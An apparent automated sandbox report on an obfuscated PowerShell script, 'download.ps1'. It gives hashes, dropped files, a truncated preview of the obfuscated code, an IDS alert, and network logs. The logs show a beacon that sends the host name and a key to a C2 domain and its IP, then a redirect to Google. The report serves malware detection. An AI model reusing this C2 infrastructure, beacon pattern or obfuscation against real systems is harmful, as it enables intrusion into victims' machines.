                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.61.136.138
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.61.136.138
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.61.136.138
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.61.136.138
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.61.136.138
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.61.136.138
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.61.136.138
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.61.136.138
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.61.136.138
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.61.136.138
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.61.136.138
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.61.136.138
                                                                                                                    la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 107.160.112.122
                                                                                                                    QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                    • 107.160.131.254
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.61.136.138
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.61.136.138
                                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    • 45.61.136.138
                                                                                                                    loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 23.179.110.68
                                                                                                                    No context
                                                                                                                    No context
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):64
                                                                                                                    Entropy (8bit):1.1628158735648508
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Nlllulvh2th:NllUE
                                                                                                                    MD5:1C6FEFD3AEFA5BA7595E7FC2E4284A86
                                                                                                                    SHA1:1061961FD8D9427258B32E58594747A9009930B7
                                                                                                                    SHA-256:AB4853F85060BF67D37B111333E3852386DF7BF6AA0499E6CEF96B10CE5A1621
                                                                                                                    SHA-512:03A091C2C65B6C22EFB336B4155E8579A540C773DB34E8F8654BC3D7044C00434020096B41BF2959245CA8722CF3913B38A653DE361A5BF0FDF218A6F07B6626
                                                                                                                    Malicious:false
                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                    Preview:@...e.................................~..............@..........
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Reputation:high, very likely benign file
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Reputation:high, very likely benign file
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6222
                                                                                                                    Entropy (8bit):3.689048669916005
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:2pMuJCLoWkvhkvCCt9/JrZfH9H8HD/JrZnH9H8HF:2KuGV9/JY/J8
                                                                                                                    MD5:3735AE0115E3BF918DD6532743935D7F
                                                                                                                    SHA1:14DE3B61E38CFD0104F31C440A37B023B9D83B8A
                                                                                                                    SHA-256:4CE74CAC1CE0EBA74AD5961FED072777EA2FFA5F05DD2E562DD1C6FE5D724855
                                                                                                                    SHA-512:429FC60BD94615DF0D8164B843BA33D82824B97B3A0FE103C4C5C8EBF8BB9E896B76D42ACC9CC66973951F8B08A427C7071EB6F31A8EDDF1BDAAA78258BC4A11
                                                                                                                    Malicious:false
                                                                                                                    Preview:...................................FL..................F.".. ...d.......)..nT..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....e.#.nT..<...nT......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y:e....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y=e..Roaming.@......DWSl.Y=e....C.....................l/{.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y:e....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW!r..Windows.@......DWSl.Y:e....E......................k..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y:e....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y:e....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.YCe....q...........
                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6222
                                                                                                                    Entropy (8bit):3.689048669916005
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:2pMuJCLoWkvhkvCCt9/JrZfH9H8HD/JrZnH9H8HF:2KuGV9/JY/J8
                                                                                                                    MD5:3735AE0115E3BF918DD6532743935D7F
                                                                                                                    SHA1:14DE3B61E38CFD0104F31C440A37B023B9D83B8A
                                                                                                                    SHA-256:4CE74CAC1CE0EBA74AD5961FED072777EA2FFA5F05DD2E562DD1C6FE5D724855
                                                                                                                    SHA-512:429FC60BD94615DF0D8164B843BA33D82824B97B3A0FE103C4C5C8EBF8BB9E896B76D42ACC9CC66973951F8B08A427C7071EB6F31A8EDDF1BDAAA78258BC4A11
                                                                                                                    Malicious:false
                                                                                                                    Preview:...................................FL..................F.".. ...d.......)..nT..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....e.#.nT..<...nT......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y:e....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y=e..Roaming.@......DWSl.Y=e....C.....................l/{.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y:e....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW!r..Windows.@......DWSl.Y:e....E......................k..W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y:e....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y:e....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.YCe....q...........
                                                                                                                    File type:ASCII text, with very long lines (10346), with CRLF line terminators
                                                                                                                    Entropy (8bit):5.95792959910712
                                                                                                                    TrID:
                                                                                                                      File name:download.ps1
                                                                                                                      File size:19'771 bytes
                                                                                                                      MD5:e8dd1c8a9dc723dd3efb012b52d487a8
                                                                                                                      SHA1:1d59b6fda15b8d29ddf665b5fc4abf715b6f0186
                                                                                                                      SHA256:96d6d2f4e613ae1d987e3f1eb72237fa1308e336e06cffdd865f0a124346a474
                                                                                                                      SHA512:915a86c00c14588f866b8c7bbe3d246df30792519aefd3f86b224746179f6adab8c2853802d8035c8c5b586e7b6472c5267d8aa25602068a3492b496935f4670
                                                                                                                      SSDEEP:384:PjSrjeulHp/ROD6eel2gYAthuqBGkZbvIMqT0CA0GXPQ1WpbTXiWdz5+fOA:Pj4VtO+lNUq7CLGfuObTSWJ5+fh
                                                                                                                      TLSH:84928DC2B784F9D186CA821F9D06AD193F7639AED4A7BCC4F19CC6C613511489E5ACC2
                                                                                                                      File Content Preview:$xqsinb=$executioncontext;$isaloristionatenesonbebeortionbe = ([CHAr[]]@((-3399+3452),(9666-9614),(456114/8002),(151550/3031),(7889-(3172365/(3776220/(18961-(11018-1381))))),(95202/1763),(-1720+(6420-4644)),(-7304+7359),(515845/9379),(-323+(-9117+(18511-(
                                                                                                                      Icon Hash:3270d6baae77db44
                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                      2024-12-22T13:42:09.949431+01002859391ETPRO MALWARE TA582 Domain in DNS Lookup1192.168.2.5618831.1.1.153UDP
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 22, 2024 13:42:10.108369112 CET4970480192.168.2.545.61.136.138
                                                                                                                      Dec 22, 2024 13:42:10.228477955 CET804970445.61.136.138192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:10.228699923 CET4970480192.168.2.545.61.136.138
                                                                                                                      Dec 22, 2024 13:42:10.243284941 CET4970480192.168.2.545.61.136.138
                                                                                                                      Dec 22, 2024 13:42:10.363272905 CET804970445.61.136.138192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:11.497710943 CET804970445.61.136.138192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:11.550379038 CET4970480192.168.2.545.61.136.138
                                                                                                                      Dec 22, 2024 13:42:11.638964891 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:11.758841991 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:11.758939028 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:11.759186983 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:11.878859043 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.585009098 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.608053923 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.608154058 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.617993116 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.659883022 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.678322077 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.722249031 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.727724075 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.727745056 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.727817059 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.779371977 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.779392958 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.779408932 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.779448032 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.779454947 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.779486895 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.779489994 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.779511929 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.779534101 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.779551983 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.779551983 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.779596090 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.780935049 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.781047106 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.781090975 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.841886044 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.842075109 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.842158079 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.847348928 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.847481012 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.847560883 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.854507923 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.854620934 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.854667902 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.899209976 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.899343967 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.899458885 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.903400898 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.903501034 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.903546095 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.911817074 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.912005901 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.912101984 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.920151949 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.920277119 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.920340061 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.928556919 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.928766966 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.928998947 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.936959028 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.937138081 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.937354088 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.945327997 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.968946934 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.968967915 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.969085932 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.973176003 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.973239899 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.973274946 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.979619026 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.979634047 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.979692936 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.983846903 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.983926058 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.983988047 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.992321014 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.992480993 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:13.993398905 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.993535042 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:13.993624926 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:14.001821041 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:14.006742001 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:14.006759882 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:14.006943941 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:14.011594057 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:14.011790991 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:14.019877911 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:14.019907951 CET8049705142.250.181.132192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:14.020014048 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:14.265115976 CET4970580192.168.2.5142.250.181.132
                                                                                                                      Dec 22, 2024 13:42:14.265846968 CET4970480192.168.2.545.61.136.138
                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Dec 22, 2024 13:42:09.949430943 CET6188353192.168.2.51.1.1.1
                                                                                                                      Dec 22, 2024 13:42:10.087150097 CET53618831.1.1.1192.168.2.5
                                                                                                                      Dec 22, 2024 13:42:11.499366999 CET5477053192.168.2.51.1.1.1
                                                                                                                      Dec 22, 2024 13:42:11.636238098 CET53547701.1.1.1192.168.2.5
                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                      Dec 22, 2024 13:42:09.949430943 CET192.168.2.51.1.1.10x7d32Standard query (0)cmacnnkfbhlcncm.topA (IP address)IN (0x0001)false
                                                                                                                      Dec 22, 2024 13:42:11.499366999 CET192.168.2.51.1.1.10x831cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                      Dec 22, 2024 13:42:10.087150097 CET1.1.1.1192.168.2.50x7d32No error (0)cmacnnkfbhlcncm.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                                      Dec 22, 2024 13:42:11.636238098 CET1.1.1.1192.168.2.50x831cNo error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                      • cmacnnkfbhlcncm.top
                                                                                                                      • www.google.com
                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      0192.168.2.54970445.61.136.138805540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 22, 2024 13:42:10.243284941 CET216OUTGET /cbym9z28drhtr.php?id=user-PC&key=95448541662&s=527 HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                      Host: cmacnnkfbhlcncm.top
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 22, 2024 13:42:11.497710943 CET166INHTTP/1.1 302 Found
                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                      Date: Sun, 22 Dec 2024 12:42:11 GMT
                                                                                                                      Content-Length: 0
                                                                                                                      Connection: keep-alive
                                                                                                                      Location: http://www.google.com


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.549705142.250.181.132805540C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 22, 2024 13:42:11.759186983 CET159OUTGET / HTTP/1.1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                      Host: www.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 22, 2024 13:42:13.585009098 CET1236INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 22 Dec 2024 12:42:13 GMT
                                                                                                                      Expires: -1
                                                                                                                      Cache-Control: private, max-age=0
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-0RrWT6XWw1bQkowfq3gQjA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                      Server: gws
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      Set-Cookie: AEC=AZ6Zc-WFqljiwcXD93t3fvnnepFh8oSpZ2MKXY39aDlwtYSMume9LaVJLz8; expires=Fri, 20-Jun-2025 12:42:13 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                      Set-Cookie: NID=520=cZw3H5PqebfZoEgf7DWuMvvENZeLlXtcdUzdcilRW20r3M4Uz0NojeFUTPV5nLF-4pbCOyvOZCIElkKNMvBAUjGctQ8ugSZSTxgIQVduUSeBEud5g_rGpLdc5S1OU1dd5YmwhZ3GjxFF4IBx3ch6ukmc_YL38x0y-UGOQ9-U1HgXEIdkQVO3NtGQIncfcQrqXUC6WTK9Ug; expires=Mon, 23-Jun-2025 12:42:13 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                      Accept-Ranges: none
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Data Raw: 33 62 65 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73
                                                                                                                      Data Ascii: 3be3<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images
                                                                                                                      Dec 22, 2024 13:42:13.608053923 CET1236INData Raw: 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20
                                                                                                                      Data Ascii: , videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/
                                                                                                                      Dec 22, 2024 13:42:13.617993116 CET1236INData Raw: 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 30 52 72 57 54 36 58 57 77 31 62 51 6b 6f 77 66 71 33 67 51 6a 41 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 67 3d 7b 6b 45 49 3a 27 4a 51 6c 6f 5a 36 4b 61 42 2d
                                                                                                                      Data Ascii: </title><script nonce="0RrWT6XWw1bQkowfq3gQjA">(function(){var _g={kEI:'JQloZ6KaB-L85OUPqLzB4A4',kEXPI:'0,18168,184579,3497532,670,435,538661,2872,2891,8348,34680,30022,360901,45786,9779,68707,30697,3801,2412,50869,7734,26,18648,8861,11813,163
                                                                                                                      Dec 22, 2024 13:42:13.678322077 CET672INData Raw: 39 37 2c 37 39 31 2c 37 33 30 2c 32 35 33 2c 33 33 2c 31 30 39 2c 31 39 30 2c 34 31 33 2c 32 35 33 2c 34 35 30 2c 39 33 2c 38 38 2c 32 37 34 2c 35 39 2c 34 33 35 2c 33 33 39 2c 31 37 35 2c 31 2c 37 37 37 2c 36 37 32 2c 31 33 30 2c 33 2c 34 39 32
                                                                                                                      Data Ascii: 97,791,730,253,33,109,190,413,253,450,93,88,274,59,435,339,175,1,777,672,130,3,492,687,633,926,6,2079,1288,21349383,37198,18,2780,702,868,5240,45,154,554,1774,8,2065,3,1202,597,17,187,668,5985170,2038088',kBL:'FVW1',kOPI:89978449};(function(){
                                                                                                                      Dec 22, 2024 13:42:13.727724075 CET1236INData Raw: 29 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 7d 66 75 6e 63 74 69 6f 6e 20 71 28 61 29 7b 2f 5e 68 74 74 70 3a 2f 69 2e 74 65 73 74 28 61 29 26 26 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c
                                                                                                                      Data Ascii: )a=a.parentNode;return b}function q(a){/^http:/i.test(a)&&window.location.protocol==="https:"&&(google.ml&&google.ml(Error("a"),!1,{src:a,glmm:1}),a="");return a}function r(a,b,d,c,h){var e="";b.search("&ei=")===-1&&(e="&ei="+n(c),b.search("&
